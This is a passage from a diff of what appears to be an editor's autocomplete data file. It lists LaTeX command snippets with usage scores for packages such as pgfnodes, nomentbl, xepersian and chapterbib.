0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfnodes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfnodes-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfnodes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfnodes-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfnodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfnodes-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfnodes-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfnodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfnodes-cmd', + score: 
0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfnodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfnodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfnodes-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfnodes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfnodes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfnodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfnodes-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfnodes-cmd', + score: 0.2864294797053033, + }, + ], + pgfarrows: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfarrows-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfarrows-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfarrows-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfarrows-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfarrows-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfarrows-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 
0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfarrows-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfarrows-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfarrows-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfarrows-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfarrows-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfarrows-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfarrows-cmd', + score: 0.2864294797053033, + }, + ], + 'pst-text': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-text-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-text-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-text-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-text-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-text-cmd', + score: 
0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-text-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-text-cmd', + score: 0.006520475264573554, + }, + ], + keystroke: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'keystroke-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'keystroke-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'keystroke-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'keystroke-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'keystroke-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'keystroke-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'keystroke-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'keystroke-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'keystroke-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'keystroke-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'keystroke-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'keystroke-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'keystroke-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'keystroke-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'keystroke-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'keystroke-cmd', + score: 0.004649150613625593, + }, + ], + currvita: [ + { + caption: '\\cvheadingfont', + snippet: '\\cvheadingfont', + meta: 'currvita-cmd', + score: 5.547871753177405e-5, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'currvita-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'currvita-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'currvita-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'currvita-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'currvita-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'currvita-cmd', + score: 0.0018957469739775527, + }, + ], + subfigmat: [ + { + caption: '\\subfigure[]{}', + snippet: '\\subfigure[$1]{$2}', + meta: 'subfigmat-cmd', + score: 0.037856842641104005, + }, + { + caption: '\\subref{}', + snippet: '\\subref{$1}', + meta: 'subfigmat-cmd', + score: 0.007192033516871399, + }, + { + caption: '\\subfigure[]{}', + snippet: '\\subfigure[$1]{$2}', + 
meta: 'subfigmat-cmd', + score: 0.037856842641104005, + }, + ], + boxhandler: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'boxhandler-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'boxhandler-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'boxhandler-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'boxhandler-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'boxhandler-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\pbox{}{}', + snippet: '\\pbox{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.0010883030320478486, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'boxhandler-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'boxhandler-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'boxhandler-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'boxhandler-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'boxhandler-cmd', + score: 0.028955796305270766, + }, + ], + media9: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'media9-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'media9-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'media9-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'media9-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'media9-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'media9-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'media9-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'media9-cmd', + score: 0.2864294797053033, + }, + ], + translator: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'translator-cmd', + score: 0.00037306820619479756, + }, + ], + german: [ + { + caption: '\\today', + snippet: '\\today', + meta: 'german-cmd', + score: 0.10733849317324783, + }, + ], + mhsetup: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mhsetup-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + 
meta: 'mhsetup-cmd', + score: 0.021170869458413965, + }, + ], + nomentbl: [ + { + caption: '\\nomenclature[]{}{}', + snippet: '\\nomenclature[$1]{$2}{$3}', + meta: 'nomentbl-cmd', + score: 0.016053526743355948, + }, + { + caption: '\\nomenclature{}{}', + snippet: '\\nomenclature{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.016053526743355948, + }, + { + caption: '\\nomlabel', + snippet: '\\nomlabel', + meta: 'nomentbl-cmd', + score: 6.353668036093916e-5, + }, + { + caption: '\\printnomenclature', + snippet: '\\printnomenclature', + meta: 'nomentbl-cmd', + score: 0.0014526113324237952, + }, + { + caption: '\\printnomenclature[]', + snippet: '\\printnomenclature[$1]', + meta: 'nomentbl-cmd', + score: 0.0014526113324237952, + }, + { + caption: '\\makenomenclature', + snippet: '\\makenomenclature', + meta: 'nomentbl-cmd', + score: 0.002310610204652063, + }, + { + caption: '\\nomgroup', + snippet: '\\nomgroup', + meta: 'nomentbl-cmd', + score: 0.0005549290951493257, + }, + { + caption: '\\nomgroup[]{}', + snippet: '\\nomgroup[$1]{$2}', + meta: 'nomentbl-cmd', + score: 0.0005549290951493257, + }, + { + caption: '\\nomname', + snippet: '\\nomname', + meta: 'nomentbl-cmd', + score: 0.0015092617929470952, + }, + { + caption: '\\nompreamble', + snippet: '\\nompreamble', + meta: 'nomentbl-cmd', + score: 2.4350510995473236e-5, + }, + { + caption: '\\nomentryend', + snippet: '\\nomentryend', + meta: 'nomentbl-cmd', + score: 0.000137692304514793, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'nomentbl-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'nomentbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'nomentbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'nomentbl-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'nomentbl-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'nomentbl-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'nomentbl-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'nomentbl-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'nomentbl-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'nomentbl-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nomentbl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'nomentbl-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'nomentbl-cmd', 
+ score: 0.018615449342361392, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'nomentbl-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'nomentbl-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'nomentbl-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'nomentbl-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'nomentbl-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'nomentbl-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'nomentbl-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'nomentbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'nomentbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'nomentbl-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'nomentbl-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'nomentbl-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'nomentbl-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'nomentbl-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'nomentbl-cmd', + score: 0.0313525090421608, + }, + ], + miller: [ + { + caption: '\\hkl', + snippet: '\\hkl', + meta: 'miller-cmd', + score: 0.0034259481311452946, + }, + { + caption: '\\hkl{}', + snippet: '\\hkl{$1}', + meta: 'miller-cmd', + score: 0.0034259481311452946, + }, + { + caption: '\\hkl[]', + snippet: '\\hkl[$1]', + meta: 'miller-cmd', + score: 0.0034259481311452946, + }, + ], + lpform: [ + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'lpform-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'lpform-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'lpform-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'lpform-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'lpform-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'lpform-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'lpform-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'lpform-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'lpform-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'lpform-cmd', + score: 0.009331077109224957, 
+ }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'lpform-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'lpform-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'lpform-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'lpform-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'lpform-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'lpform-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'lpform-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'lpform-cmd', + score: 0.009331077109224957, + }, + ], + xepersian: [ + { + caption: '\\settextfont[]{}', + snippet: '\\settextfont[$1]{$2}', + meta: 'xepersian-cmd', + score: 0.00015447355412753335, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xepersian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xepersian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'xepersian-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'xepersian-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xepersian-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xepersian-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xepersian-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'xepersian-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'xepersian-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'xepersian-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + 
caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xepersian-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xepersian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xepersian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + ], + chapterbib: [ + { + caption: '\\bibliographystyle{}', + snippet: '\\bibliographystyle{$1}', + meta: 'chapterbib-cmd', + score: 0.25122317941387773, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'chapterbib-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\include{}', + snippet: '\\include{$1}', + meta: 'chapterbib-cmd', + score: 0.1547080054979312, + }, + ], + 